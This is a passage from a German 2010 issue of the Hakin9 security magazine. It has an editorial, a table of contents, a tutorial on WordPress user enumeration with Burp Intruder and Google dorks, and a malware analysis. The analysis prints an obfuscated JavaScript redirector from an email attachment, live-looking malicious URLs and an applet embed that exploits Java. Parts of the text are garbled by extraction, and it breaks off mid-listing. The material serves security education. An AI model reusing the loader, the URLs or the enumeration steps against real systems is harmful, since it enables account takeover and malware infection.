LIEBE HAKIN9 LESER,

as Hauptthema dieser Ausgabe von Hakin9 ist Penetration Testing. Im Jahr

D 2010 ist es kein Problem mehr, ein Netzwerk vor Gefahren zu schützen. Ist
es wirklich so?
Darüber erfahren Sie aus dem Artikel von Dimitri Roschkowski “Penetration
7HVWLQJLP-DKUH³GHULQGHUQHXHQ5XEULN3UD[LV]X¿QGHQLVW
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun
GHV $QZHQGHUV RGHU QXU PLW VHKU ZHQLJ (LQÀXVVQDKPH GHV $QZHQGHUV
Schadsoftware installieren. Das eleven Research-Team hat ein Beispiel näher
XQWHUVXFKW(UJHEQLVVHGLHVHU8QWHUVXFKXQJ¿QGHQ6LHLP$UWLNHOYRQ0LFKDHO
Peick “Malware-Doppelschlag per JavaScript und JavaApplet“ in der Rubrik
Fortgeschrittene.
In der letzten Ausgabe hat Andreas Lentwojt ausführlich die Norm ISO/IEC
27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben. Ein
Teil dieser Familie ist die ISO 27005, die sich mit dem IT-Risikomanagement
befasst. In der heutigen Ausgabe wird der Autor in dem Artikel “IT-
Risikomanagement – Wozu brauche ich das?“ darstellen, warum es nützlich
ist, sich mit dem Risikomanagement der IT zu beschäftigen und dabei auf das
Modell der ISO 27005 zurück zu greifen. Auf dieses Thema wurde bereits in
einer früheren Ausgabe eingegangen, in diesem Artikel wird aber mehr auf die
Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen.
Heutzutage sind wir überall von Computern umgeben. In der IT-Branche
herrscht trotzdem ein Frauenmangel. Warum ist es so? Woraus resultieren die
Vorurteile gegen die Frauen, die sich mit Computern beschäftigen? Wie sieht
die Situation von Frauen in der IT-Branche aus?
Auf diese und viele andere Fragen antwortet unsere Gesprächspartnerin
Ulrike Peter im Interview „Erfolgreiche Frauen in der IT-Branche - ein
Erfahrungsbericht“, das in dieser Ausgabe von Hakin9 besonders zu empfehlen
ist.
Sie möchten unser Heft jeden Monat automatisch bekommen? Nichts ein-
facher als dies. Registrieren Sie sich für unseren Newsletter auf www.hakin9.org/
de und Sie werden regelmäßig jede Hakin9 Ausgabe in Ihrem E-Mail-Account
YRU¿QGHQ -HGH $XVJDEH ZLU QlPOLFK DXWRPDWLVFK DQ XQVHUH 6XEVFULEHU YHU
schickt.
Ich hoffe, dass wir mir dieser Ausgabe Ihren Herausforderungen gewachsen
sind.

Viel Spaß beim Lesen!

,ORQD3U]\E\VáDZVND

5/2009 HAKIN9 4
 10/2010

INHALTSVERZEICHNIS

FÜR EINSTEIGER FORTGESCHRITTENE

06 User Enumeration bei Web-Applikationen
Kai Renz
Wo der normale Benutzer nicht hin soll, wo wichtige
Daten nur für einen kleinen Kreis an Personen zugäng-
lich sein sollen, wo administrative Aufgaben erledigt
werden - überall dort werden Authentifizierungen ein-
gesetzt.
11 Malware-Doppelschlag per JavaScript und
JavaApplet
Michael Peick
Besonders in diesem Jahr steigt die Anzahl der E-Mails
die ohne Zutun des Anwenders oder nur mit sehr we-
nig Einflussnahme des Anwenders Schadsoftware ins-
tallieren. Das eleven Research-Team hat ein Beispiel
näher untersucht.

PRAXIS
17 Penetration Testing im Jahre 2010
Dimitri Roschkowski
Viele Administratoren übersehen leider bei der Absi-
cherung des Netzwerkes seine physikalische Sicher-
heit. Die Bedrohung kommt nicht nur durch das Ether-
net-Kabel.

ABWEHR
25 OCTAVE – Hier macht das Risiko die Musik
Helmut Kaufmann
Die überwiegende Mehrheit von Unternehmen sind
nach regulativen Vorgaben wie z.B. Basel II, Solvency
II, SOX, 8. EU Auditrichtlinie oder SAS 70 angehalten
ein nachhaltiges und nachvollziehbares Risikomanage-
ment und Business Continuity Planning zu implemen-
tieren.

Umschlagsentwurf: 3U]HP\VáDZ%DQDVLHZLF] Anmerkung!

herausgegeben vom Verlag:
Software Press Sp. z o. o. SK
Geschäftsführer: 3DZHá0DUFLQLDN
Managing Director: (ZDàR]RZLFND
ewa.lozowicka@software.com.pl
Chefredakteurin:,ORQD3U]\E\VáDZVND
ilona.przybyslawska@software.com.pl
Redaktion/Betatester: Kai Renz, Michael
Peick, Dimitri Roschkowski, Helmut Kauf-
mann, Andreas Lentwojt, Patrick Schmid,
Tobias Glemser, Ulrike Peter, Nicole Huck,
Michael Schratt
Produktion: Andrzej Kuca
DTP: 3U]HP\VáDZ%DQDVLHZLF]
Werbung: adv@software.com.pl
Anschrift:
Software Press Sp. z o.o. SK
ul. Bokserska 1, 02-682 Warszawa, Poland
Tel. +48 22 427 36 56, Fax +48 22 244 24 59
www.hakin9.org/de
Die Redaktion bemüht sich, dafür Sorge zu
tragen, dass die in der Zeitschrift sowie auf
den begleitenden Datenträgern erhaltenen
Informationen und Anwendungen zutreffend
und funktionsfähig sind, übernimmt jedoch
keinerlei Gewähr für derer Geeignetheit für
bestimmte Verwendungszwecke. Alle Mar-
kenzeichen, Logos und Handelsmarken, die
sich in der Zeitschrift befinden, sind regist-
rierte oder nicht-registrierte Markenzeichen
der jeweiligen Eigenümer und dienen nur als
inhaltliche Ergänzungen.
Die in der Zeitschrift demonstrierten Techniken
sind AUSSCHLIEßLICH in eigenen Rechner-
netzen zu testen! Die Redaktion übernimmt
keine Haftung für eventuelle Schäden oder
Konsequenzen, die aus der unangemessenen
Anwendung der beschriebenen Techniken
entstehen. Die Anwendung der dargestellten
Techniken kann auch zum Datenverlust führen!
hakin9 erscheint in folgenden Sprachversionen
und Ländern: deutsche Version (Deutschland,
Schweiz, Österreich, Luxemburg), französische
Version (Frankreich, Kanada, Belgien, Marok-
ko), spanische Version (Spanien, Portugal),
polnische Version (Polen), englische Version
(Kanada, USA)

4 6/2010
 InhaltsverzeIchnIs

30 IT-Risikomanagement – Wozu brauche ich

das?
Andreas Lentwojt
In der letzen Ausgabe habe ich Ihnen ausführlich die
Norm ISO/IEC 27001 vorgestellt und einen kurzen Ein-
blick in die 27000-Familie gegeben. Ein Teil dieser Fa-
milie ist die ISO 27005, die sich mit dem IT-Risikoma-
nagement befasst.

ANGRIFF
37 DNS Cache Poisoning
Patrick Schmid
Als Ergänzung zu meinem ersten Artikel Java Applet
Attacke erfahren wir hier, wie wir ein Opfer mittels DNS
Spoofing unbemerkt eine präparierte Seite unterschie-
ben können.

INTERVIEW
41 Interview mit Tobias Glemser
„Sicherheit darf nicht erst am Ende von neuen Anwen-
dungen, Produkten oder Projekten als Kontrollinstru-
ment einbezogen, sondern muss als integraler und vor
Allem unterstützender Bestandteil eines erfolgreichen
Produkts gesehen werden.“
Mehr erfahren Sie aus dem Interview mit Tobias Glem-
ser – leitender IT-Sicherheitsberater bei der Tele-Con-
sulting security networking training GmbH in Gäufelden
bei Stuttgart und verantwortlich für den Geschäftsbe-
reich Penetrationstests.
44 Interview mit Ulrike Peter
„Die IT ist (und bleibt es sicher auch) eine Männerdo-
mäne – Frauen in der IT-Branche sind Paradiesvögel.“
Mehr erfahren Sie aus dem Interview mit Ulrike Peter –
freie Journalistin und seit zehn Jahren für unterschiedli-
che Unternehmen und Medien in der IT-Branche tätige
PR-Spezialistin.
REZENSIONEN
46 SAP for DFPS Implementierung und Custo-
mizing
Nicole Huck
Das Buch SAP for DFPS Implementierung und Cus-
tomizing, basiert auf mehr als 20 Jahren Erfahrung,
die die Autoren insgesamt bei der Entwicklung, Imple-
mentierung, aber auch Schulung der Lösung sammeln
konnten.

Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem

deutschen Recht stattgefunden haben und die IT-Sicherheit be-
treffen, möchten wir ankündigen, dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt.
Unser Magazin dient ausschließlich den Erkenntniszwecken.
Alle im Magazin präsentierten Methoden sollen für eine sichere IT
fungieren. Wir legen einen großen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Be-
kämpfung von IT Kriminalität.

hakin9.org/de 5
 FÜR EINSTEIGER
User Enumeration bei
Web-Applikationen
Kai Renz
Wo der normale Benutzer nicht hin soll, wo wichtige Daten nur
für einen kleinen Kreis an Personen zugänglich sein sollen, wo
administrative Aufgaben erledigt werden - überall dort werden
Authentifizierungen eingesetz.
IN DIESEM ARTIKEL ERFAHREN SIE...
t

"VG
XFMDIFS
8FJTF
8FC"QQMJLBUJPOFO
TFOTJCMF
*OGPSNBUJPOFO

QSFJTHFCFO
t

8JF
4JF
6TFS
&OVNFSBUJPO
CFJ
8FC"QQMJLBUJPOFO
EVSDIGàI-
ren
t

8JF
EJF
HFXPOOFOFO
*OGPSNBUJPOFO
XFJUFS
WFSXFOEFU
XFS-
den
as Problem mit solchen Authentifizierung ist,
D
dass sie nur maximal so sicher sind, wie ihr
schwächstes Glied. Durch das Web 2.0 wird im-
mer mehr auf Komfort und Benutzerfreundlichkeit ge-
setzt, wodurch einfache Sicherheitsmechanismen ihre
Wirkung verfehlen. Bruteforce Angriffe galten durch
die schier unendlichen Kombinationsmöglichkeiten als
„nicht mehr praktikabel“. Viele Seiten erlauben es uns
aber, die Anzahl an Versuchen drastisch einzuschrän-
ken, da sie Informationen preisgeben, die einen Angriff
oftmals bedeutend einfacher machen.
Wenn Sie sich heute im Internet herumtreiben, finden
Sie sich zwischen Social Networks, Auktionsplattfor-
men und Tauschbörsen wieder. Identitäten werden im
Netz frei und für jedermann zugänglich eingestellt, und
manch einem kommt es vor, wie wenn er durch Twit-
ter und Co. mehr über seinen Nachbarn wüsste, wie
über seinen langjährigen Freund. Obwohl viele immer
noch der Ansicht sind, sich frei und anonym im Internet
bewegen zu können, so stellen sie doch Details über
ihr Leben jedem frei zur Verfügung. Sie denken ein frei
erfundener Benutzername halte die meisten davon ab
ihre wahre Identität herauszufinden? Lassen Sie sich
gesagt sein das dies ein Irrtum ist – ein sehr großer Irr-
tum! Die Gefahr, die all dies mit sich bringt, ist leicht zur
erklären: Stellen Sie sich vor, sie arbeiten in einem gro-
ßen Telekommunikationsunternehmen. Über Facebook
und Xing halten Sie gerne Kontakt mit Kollegen aus
6 9/2010
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...
t
(SVOEXJTTFO
8FC"QQMJLBUJPOFO
VOE
EFSFO
'VOLUJPOTXFJTF
t
(SVOEXJTTFO
'VOLUJPOTXFJ•F
#VSQTVJUF
dem Ausland – dafür sind diese Plattformen ja schließ-
lich auch bestens geeignet. Doch was, wenn jemand ihr
Konto übernimmt und unter Ihrem Namen dort Humbug
treibt? Stellen Sie dies nicht sofort fest, so kann diese
Internetplattform schnell zu einem sehr großen Problem
werden. Schon bei der Anmeldung bei diesen Seiten le-
gen wir unsere wichtigen Daten in die Hände der Betrei-
ber, ohne das uns eigentlich wirklich interessiert, wofür
diese weiter verwendet werden. Erst wenn mal wirklich
ein großer Skandal an die Oberfläche dringt, herrscht
Empörung und die allgemeine „ich hab‘s doch gesagt“-
Stimmung kommt auf. Bei Spammern und Crackern
sind Accounts zu Auktionsplattformen, Email-Konten
und Social Networks sehr beliebt da viele Benutzer für
mehrere Zugänge das selbe Passwort verwenden und
so zum Beispiel durch den eBay-Account auf Rechnung
des Opfers eingekauft werden kann. Ein Benutzer kann
hier nur wenige, trotzdem aber effektive Maßnahmen
ergreifen. Ein sicheres Passwort zu wählen ist der erste
und wichtigste Schritt, wobei immer mehr Passwörter
über nicht-verschlüsselte Verbindungen und Keylogger
abgefangen werden und somit auch das sicherste Pass-
wort nutzlos ist. Ein zweiter Schritt wäre verschiedene
Passwörter für die unterschiedlichen Seiten zu verwen-
den und diese regelmäßig zu erneuern. Dieser Schritt
wird aber leider nur sehr selten wirklich umgesetzt, da
er mit grossem Aufwand verbunden ist und die meisten
Benutzer keine Lust haben sich mehrere verschiedene
 User Enumeration bei Web-Applikationen
Passwörter zu merken. Oftmals werden zwar viele ver-
schiedene Zugangsdaten verwendet, durch das häufige
wechseln, werden dann aber eher einfache Passwörter
verwendet, damit der Benutzer sich diese leicht merken
kann.
Um einen Zugang zum Benutzerkonto des Anwen-
ders zu bekommen, sind meist ein Benutzername und
ein Passwort nötig. Oftmals fangen hier schon die Pro-
bleme an. Hat der Angreifer herausgefunden, dass sich
die Benutzer durch eine Email-Passwort-Kombination
anmelden können, muss er schon mal viel weniger Zeit
investieren, den Benutzernamen herauszufinden, was
bei einem Bruteforce-Angriff ein Zeitvorteil sein, wel-
cher zwischen durchführbar und nicht durchführbar, al-
so Erfolg und Misserfolg entscheidet. Oftmals reicht al-
so schon eine simple Registrierung bei einer Zielseite
um die Feinheiten einer Anmeldefunktion herauszufin-
den und auszunutzen. Kann ein Benutzer seinen Nick-
namen frei wählen, so sind die Möglichkeiten bei einem
Bruteforce-Angriff wieder immens, sodass der Angrei-
fer eine andere Taktik wählen muss. Er wird versuchen
ohne mühsames Durchprobieren von Kombinationen
an den Benutzernamen zu kommen oder einen ande-
ren Schwachpunkt im System ausnutzen. In diesem
Artikel werde ich ein paar einfache Möglichkeiten dar-
stellen um einer Web-Applikation Benutzernamen zu
entlocken (User Enumeration) und diese automatisch
aufzunehmen.
Wie bereits oben beschrieben kann sich der Angrei-
fer, sofern er dazu berechtigt ist, zuerst ein Bild vom Re-
gistrierungs- bzw. Login-Mechanismus machen. Findet
er beispielsweiße heraus dass der Benutzername eine
Mailadresse ist, so kann er leicht Suchmaschinen oder
Social Networks verwenden, um diese herauszufinden.
Werden frei wählbare Benutzernamen verwendet, so
fällt diese Art von Recherche weitestgehend aus, wo-
bei natürlich auch hier manchmal ein Glückstreffer da-
bei sein kann. In so einem Fall wird der Angreifer aber
Request
Benutzername: 1a2a3d4f
Passwort: sosecret
Benutzername: foobar
Passwort: sosecret
Bruteforce
Benutzername: foobar
Passwort: topsecret
Abbildung 1. Funktionsweiße einfache User Enumeration
hakin9.org/de
anders vorgehen: er überprüft den Login-Mechanismus
auf Ausgaben, welche den Benutzernamen verraten
oder Hinweise darauf geben könnten ob der zum Test
angegebene Name ein wahrer Benutzername ist. Hin-
weise darauf geben Rückgaben wie „Das für diesen Be-
nutzernamen angegebene Passwort ist nicht korrekt!“
oder ähnliches. Gegengeprüft werden kann dies durch
die Eingabe eines fiktiven Benutzers. Variiert die Aus-
gabe von der obigen so ist es sehr wahrscheinlich dass
der zuvor verwendete Name korrekt war.
Ein weiterer Angriffsvektor ist die „Passwort-verges-
sen-Funktion“. Ist solch eine Funktion schlecht ge-
schrieben, oder ist diese einfach nur zu leichtsinnig
dem Benutzer Komfortfunktionen anzubieten, können
für den Angreifer wichtige Informationen preisgeben
werden. Eine Fehlkonfiguration, bzw. leichtsinnige Web
2.0 Funktion, wie die eben angesprochene, kann zum
Beispiel bei Eingabe der Mailadresse auf der Passwort-
Vergessen-Seite mit einem Satz wie „Eine Email mit
Ihrem neuen Passwort für den Benutzeraccount <na-
me> wurde erfolgreich an Sie zugestellt“ antworten,
wodurch der wahre Benutzer zwar eine Email, der An-
greifer jedoch auch den Benutzernamen erhält. Ist die
angegebene Sicherheitsadresse inaktiv oder wird nur
sporadisch verwendet, so geht diese Email leicht un-
ter und der Angreifer kann mit seiner Arbeit fortfahren.
Ein gutes Beispiel hierfür ist Wordpress. Auch in seiner
neuesten Version kann über die „Passwort-vergessen-
Funktion“ der Benutzername herausgefunden werden.
Ein sogenannter Bot-Schutz ist nicht vorhanden, so-
dass wir das ganze mit einem Webproxy, in unserem
Fall Burpsuite, automatisieren können.
Durch eine lokale Recherche an einem Wordpress
haben wir herausgefunden, dass beim Eingeben eines
falschen Benutzernamens ein Fehler zurückgegeben
wird: ERROR: Invalid username or e-mail. Verwenden
wir jedoch den richtigen Benutzernamen erhalten wir
ein: Check your e-mail for the confirmation link.
Response
Benutzer oder Passwort falsch
Falsches Passwort
Login erforgreich!
7
 FÜR EINSTEIGER
Nun müssen wir uns genauer ansehen was zwischen
unserem Client und dem Webserver kommuniziert wird.
Hierfür starten wir Burpsuite und konfigurieren unseren
Browser so dass er als Proxy localhost auf Port 8080
verwendet. Als nächstes wechseln wir in den Proxy-Tab
und setzen Intercept auf Off. Durch das Deaktivieren
dieser Funktion verhindern wir, das uns Burpuite bei
jedem Schritt frägt, ob wir die Daten wirklich zu unse-
rem Webserver senden wollen. Als nächstes besuchen
wird unsere Zielseite. Wordpress verwendet immer
das gleiche Schema: http://www.zielseite.de/wp-login.
php?action=lostpassword. Wir geben absichtlich ei-
nen falschen Benutzernamen an und verfolgen wie die
Abbildung 2. Unser POST-Request an Wordpress
Abbildung 3. Der Parameter der verändert werden soll wird markiert
8 9/2010
POST-Anfrage und deren Antwort von Burpsuite aufge-
zeichnet werden. Dort können wir unter request -> pa-
rams unsere gerade eingegebenen und noch weitere
Daten betrachten (Abbildung 2).
Als nächstes senden wir den Request per Rechts-
klick an den Intruder. Das Target-Tab lassen wir unbe-
rührt, wir werden erst bei den Positions-Optionen aktiv.
Wir klicken rechts auf „clear $“. Als Attacke verwenden
wir Sniper. Ganz unten im Textfeld sehen wir eine Zeile
mit „user_login“. Dies sind die Parameter die per POST
übergeben werden. Ich markiere den zum Test einge-
gebenen Benutzername und klicke auf „add $“ (Abbil-
dung 3).
 User Enumeration bei Web-Applikationen
Abbildung 4. Burpsuite Intruder hat zwei Benutzer identifizieren können
Nun müssen wir noch unser Payload konfigurieren. Hier
verwenden wir „Payload Set 1, present list“. Man kann nun
optional eine ganze Liste mit Benutzernamen laden, oder
einfach per Hand einige eintragen. Nun müssen wir noch
unterscheiden lassen wann ein Benutzer gefunden wur-
de und wann nicht. Dazu gehen wir in den Option-Tab und
scrollen zu grep. Wir aktivieren die Checkboxen bei „search
responses for these expressions“ und „simple pattern
match“. Außerdem drücken wir auf clear. Die voreingestell-
ten Pattern brauchen wir nicht zu verwenden. Wir wissen
dass bei Eingabe eines existierenden Benutzernamens ein
„Check your e-mail for the confirmation link“ zurückgeliefert
wird. Also tragen wir genau diesen Satz ein und klicken auf
add. Nun geben wir noch an, dass wird redirects folgen wol-
len. Damit haben wir alles nötige konfiguriert. Wir klicken
in der Menuleiste auf intruder -> start attack. Nach einer
kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat
zwei Benutzer identifiziert (Abbildung 3)! Eine gute Wörter-
liste erhöht die Effizient natürlich deutlich!
Somit konnten wir leicht über die Passwort-Verges-
sen Funktion automatisiert Benutzer erfassen. Natürlich
Listing 1. Google Dorks
inurl:memberlist.php "Powered by phpBB"
¿OHW\SH:php "memberlist"
¿OHW\SH:txt "memberlist"
¿OHW\SH:txt "usernames"
¿OHW\SH:sql "users"
hakin9.org/de
funktioniert dies auch mit Registrierungssystemen die
angeben ob ein Benutzername schon vergeben ist. Den
Möglichkeiten sind hier nur durch die eigene Kreativi-
tät Grenzen gesetzt. Mit dieser simplen Methode gelingt
es einem Angreifer automatisiert Benutzernamen zu fin-
den – doch was kann noch passieren?
Eine oft übersehene Tatsache ist dass das Problem
oft vor der Tastatur sitzt. Sprich, der Admin hat etwas
falsch konfiguriert. So kann es vorkommen dass gan-
ze Mitgliederlisten in Foren öffentlich zugänglich sind
oder im Cache von Suchmaschinen gefunden werden
können. Durch Suchmaschinen wie Google lassen sich
solche falsch konfigurierten Seiten leicht auffinden. Ei-
ne kleine Liste an Google Dorks ist in Listing 1 angege-
ben. Eine weitere Möglichkeit Benutzernamen zu identi-
fizieren sind URLs. Twitter ist hier ein schönes Beispiel.
Jeder Benutzer kann sich unter twitter.com/benutzerna-
me austoben. Dies stellt eine weitere Möglichkeit dar
automatisch Namen zu entlarven. Wie bereits erwähnt
gibt es unzählige Möglichkeiten User Enumeration zu
betreiben wodurch Bruteforce eine nicht zu unterschät-
zende Möglichkeit bleibt.
KAI RENZ
Der Autor befindet sich gerade in Ausbildung zum Fachinfor-
matiker für Systemintegration. In seiner Freizeit beschäftigt
er sich mit Themen rund um IT-Sicherheit und Penetration Tes-
ting.
Kontakt mit dem Autor: kai.renz@proof-of-concept.org
9
 2010
www.sigs-datacom.de

Kontakt: Anja Keß, · Lindlaustraße 2c, D-53842 Troisdorf,

Tel.: +49 (0) 22 41 / 23 41-201 · Fax: +49 (0) 22 41 / 23 41-199 · Email: anja.kess@sigs-datacom.de

Erfolgreich durch Wissensvermittlung aus 1. Hand

Q Die ultimative Hacking-Akademie
Q Erfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres Netzwerks
Klaus Dieter Wolfinger
20. – 22. September 2010
03. – 05. November 2010, Frankf./M. 2.150,- € zzgl. MwSt.
Q NEU – jetzt 3-tägig:
CSM Certified ScrumMaster Course
Q Voraussetzung für die Zertifizierung zum Scrum Master
Sabine Canditt
25. – 27. Oktober 2010, München
07. – 09. Dezember 2010, München 2.150,- € zzgl. MwSt.

Q Best Practices für sichere Web-Anwendungen Q Secure Coding mit Java EE

Q Sicherheitslücken in Webanwendungen vermeiden, Q Entwicklung einbruchssicherer Webanwendungen
erkennen und schließen – gemäß Empfehlung des BSI und Webservices unter Java EE
Thomas Schreiber Mirko Richter
25. – 26. Oktober 2010, Düsseldorf 26. – 27. Oktober 2010,
08. – 09. Dezember 2010, München 1.590,- € zzgl. MwSt. 06. – 07. Dezember 2010, München 1.590,- € zzgl. MwSt.

Q Sicherheit mit WebService-Infrastrukturen Q Web Application Firewall Starter

Jörg Bartholdt Q Essentielles Web Application Firewall Grundwissen
25. – 26. Oktober 2010, Achim Hoffmann
22. – 23. November 2010, München 1.590,- € zzgl. MwSt. 17. November 2010, München 990,- € zzgl. MwSt.

Q Cloud Computing im praktischen Einsatz Q Advanced Web Application Security Testing

Arnd Kleinbeck & Stefan Tilkov Q Professionelle Sicherheitsuntersuchungen von
24. Oktober 2010, München Enterprise-Webanwendungen durchführen
10. Dezember 2010, Köln 990,- € zzgl. MwSt. Thomas Schreiber
01. – 02. Dezember 2010, München 1.590,- € zzgl. MwSt.
Q iPhone Grundlagen und Entwicklung
Hendrik Schreiber
11. – 12. Oktober 2010, Köln
11. – 12. Dezember 2010, Köln 1.590,- € zzgl. MwSt.

www.sigs-datacom.de www.sigs-datacom.de
 Malware-Doppelschlag per JavaScript und JavaApplet

Malware-Doppelschlag per
JavaScript und JavaApplet
Automatischer Download durch JavaScript und
Ausbruch aus der Virtuellen Java Umgebung
Michael Peick
Besonders in diesem Jahr steigt die Anzahl der E-Mails
die ohne Zutun des Anwenders oder nur mit sehr wenig
Einflussnahme des Anwenders Schadsoftware installieren.
Das eleven Research-Team hat ein Beispiel näher untersucht.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...

t
XJF
4DIBETPGUXBSF
àCFS
BLUVFMMF
4JDIFSIFJUTMàDLFO
WFSCSFJUFU
t
'VOLUJPOTXFJTF
WPO
+BWB"QQMFUT
VOE
(SVOEMBHFO
WPO
+BWB-
wird. Script und HTML.

s handelt sich dabei um eine E-Mail die massen-

E
haft versandt wird und eine Website/HTML-Datei
als Anhang enthält. Die E-Mail hat eine unver-
fängliche Betreffzeile wie „Re: Vacation“ oder „Ran-
dolph Plans“ und einen ebenfalls unverdächtigen Text
wie beispielsweise:
„Thank you very much for meeting with me on Satur-
day. Attached are the plans for the Randolph Street De-
velopment project we discussed. If you have any ques-
tions please don't hesitate to contact me.
Thanks again.“
Im HTML-Anhang befindet sich ein eingebetteter
JavaScript Code. Um die Erkennung des JavaScript
Codes zu erschweren, wurde er verschleiert/unleserlich
gemacht, in der Fachsprache auch als Obfuscation be-
zeichnet (vgl. Listing 1.).
Wird die Datei "39035xls.html" im Anhang im Brow-
ser aufgerufen, dann wird der Nutzer mittels des Ja-
vaScripts an eine bestimmte Internetseite weitergeleitet,
die Schadcode enthält. Schreibt man das JavaScript-
Codefragment leserlicher, dann sieht man, dass eine
Weiterleitung zur Seite "http://numerouno-india.com/x.
html" führt1 (vgl. Listing 2.).
Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL "http://scaner-g.
cz.cc/scanner10/?afid=24". Interessant ist hier nicht
die Weiterleitung an eine weitere Seite, sondern die
Tatsache, dass ein unsichtbares iFrame mit Brei-
te 0 Pixel und Höhe 0 Pixel geladen wird. Schauen
wir uns die dahinterliegende Seite "http://arestyute.
com/sadhbdsa879321jbdas/index.php" etwas ge-
nauer an (vgl. Listing 3.).

Listing 1. Die Datei "39035xls.html":

<script language="JavaScript" type="text/javascript">function etgr(zj4r){var\nbo97,bvgy="",kpn8,iyv2="0ocdfu

m;ip/qrlx=nt.-:v he>s"a<",p3je,j446=iyv2.length;eval(unescape("%66un%63ti%6Fn r%61iy%28ku
%79c){%62vg%79+=%6Buyc%7D"));for(p3je=0;p3je<zj4r.length;p3je++){bo97=zj4r.charAt(p3je);k
pn8=iyv2.indexOf(bo97);if(kpn8>-1){kpn8-=(p3je+1)%j446;if(kpn8<0){kpn8+=j446;}raiy(iyv2.
charAt(kpn8));}else{raiy(bo97);}}eval(unescape("%64oc%75me%6Et.w%72it%65(b%76gy)%3Bbv%67y
=%22%22;"));}etgr("0i"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e"moc>;a<msatmsol<.ituqchiix-
e<u0:alpaxr");</script><noscript>To display this page you need a browser that supports
JavaScript.</noscript>

hakin9.org/de 11
 FORTGESCHRITTENE
Hier ist ein Java-Applet eingebettet, welches beim
Aufruf der Seite von der Java-Virtual-Machine ausge-
führt wird, sofern diese im Browser installiert und akti-
viert ist. Ein weiterer verschleierter JavaScript-Code fin-
det sich ebenfalls.
Zunächst analysieren wir das Java-Applet "tmp/des.
jar". In der Datei befinden sich drei Java-Klassen von
denen eine Namens dev.s.AdgredY als Einsprungs-
punkt für das Applet dient. Mit einem Java-Decompiler
kann man die Klassen, welche momentan in Java-Byte-
code vorliegen, in leserlichen Java-Quelltext überfüh-
ren. Dies entspricht nicht ganz dem originalem Quell-
text, kommt ihm aber recht nahe. Wir benutzen dafür
den Decompiler von http://java.decompiler.free.fr/.
Schaut man sich nun den Java-Quelltext an, stellt man
fest, dass keine Obfuscation für Java, wie z.B. das un-
ter der GPL 2+ stehende ProGuard, benutzt wurden.
Was zu erwarten gewesen wäre, um die Erkennung zu
erschweren.
Nach einer Verifikation der als Parameter übergebe-
nen URL "http://arestyute.com/sadhbdsa879321jbdas/l.
php?deserialize=6e&i=1" wird abhängig von der Java-
Listing 2. Weiterleitung an eine weitere Seite
function etgr(zj4r) {
var
bo97, bvgy = "",
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s"a<",
p3je, j446 = iyv2.length;
/* function raiy(kuyc){bvgy+=kuyc} */
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c)
{%62vg%79+=%6Buyc%7D"));
for (p3je = 0; p3je < zj4r.length; p3je++) {
bo97 = zj4r.charAt(p3je);
kpn8 = iyv2.indexOf(bo97);
if (kpn8 > -1) {function etgr(zj4r) {
var
bo97, bvgy = "",
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s"a<",
p3je, j446 = iyv2.length;
/* function raiy(kuyc){bvgy+=kuyc} */
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c)
{%62vg%79+=%6Buyc%7D"));
for (p3je = 0; p3je < zj4r.length; p3je++) {
bo97 = zj4r.charAt(p3je);
kpn8 = iyv2.indexOf(bo97);
if (kpn8 > -1) {+
kpn8 -= (p3je + 1) % j446;
if (kpn8 < 0) {
kpn8 += j446;
}
12
Version ein bestimmter Codeblock angesprungen, wel-
cher eine Schwachstelle in der JVM ausnutzt, wodurch
ein Jailbreak ermöglicht wird. Ursprünglich sollen Ja-
va-Anwendungen in einer Art sicheren Sandbox lau-
fen und keinen Schaden im Computer anrichten2. Die-
se Barriere ist in unserem Beispiel durchbrochen. In
dem Codefragment unten (vgl. Listing 4a, 4b), betrifft
die ausgenutzte Schwachstelle vor allem die Java Ver-
sion bis einschließlich 1.6.0_16. Unter "http://vreugden-
hilresearch.nl/2010/05/java-midi-parse-vulnerabilities/"
kann jeder Interessierte detaillierte Informationen zur
verwendeten Schwachstelle erhalten. Ausgangspunkt
ist ein Fehler in der Verarbeitung von URLs im einge-
bauten Midiplayer von Java.
Beim Ausnutzen der Schwachstelle wird der Shell-
code ausgeführt, welcher nun vollen Zugriff auf das
System hat und Schadsoftware mitsamt Trojaner von
der externen Quelle (URL) nachladen kann.
Sollte der Benutzer eine ältere Java Version instal-
liert haben, so wird eine andere Codepassage ange-
sprungen, die Schwachstellen älterer Java Versionen
ausnutzt.
raiy(iyv2.charAt(kpn8));
} else {
raiy(bo97);
}
}
/* document.write(bvgy);bvgy=""; */
eval(unescape("%64oc%75me%6Et.w%72it%65(b%76gy)%3Bbv%
67y=%22%22;"));
}
/* document.write('<meta http-equiv="refresh"
content="0;url=http://numerouno-
india.com/x.html" />');
etgr("0i"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x
e"moc>;a<msatmsol<.ituqchiix-
e<u0:alpaxr");
if ('this_is' == /an_example/) {
do_something();
} else {
var a = b ? (c % d) : e[f];
}
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://
VFDQHUJF]FFVFDQQHU"D¿G 
/>
<iframe width="0" height="0" src="http://arestyute.
com/sadhbdsa879321jbdas/index.
php"></iframe>
10/2010
 Malware-Doppelschlag per JavaScript und JavaApplet
Listing 3. Seite „http://arestyute.com/sadhbdsa879321jbdas/
index.php” (gekürztes HTML Dokument):
<body id='greldm2'>
<applet archive='tmp/des.jar' code='dev.s.AdgredY'
width='462' height='255'>
<param name='data' VALUE='http://arestyute.
com/sadhbdsa879321jbdas/l.
php?deserialize=6e&i=1'/>
<param name='cc' value='1'/>
</applet>
</body>
<script>var cmjve3="d.<i'<ih''=A2F40Jy=s'o##ayQ'a'Ua'b0
=gio'<>~d'55%00%3c%84%40%47%000000
000001000001100200000000000000000D
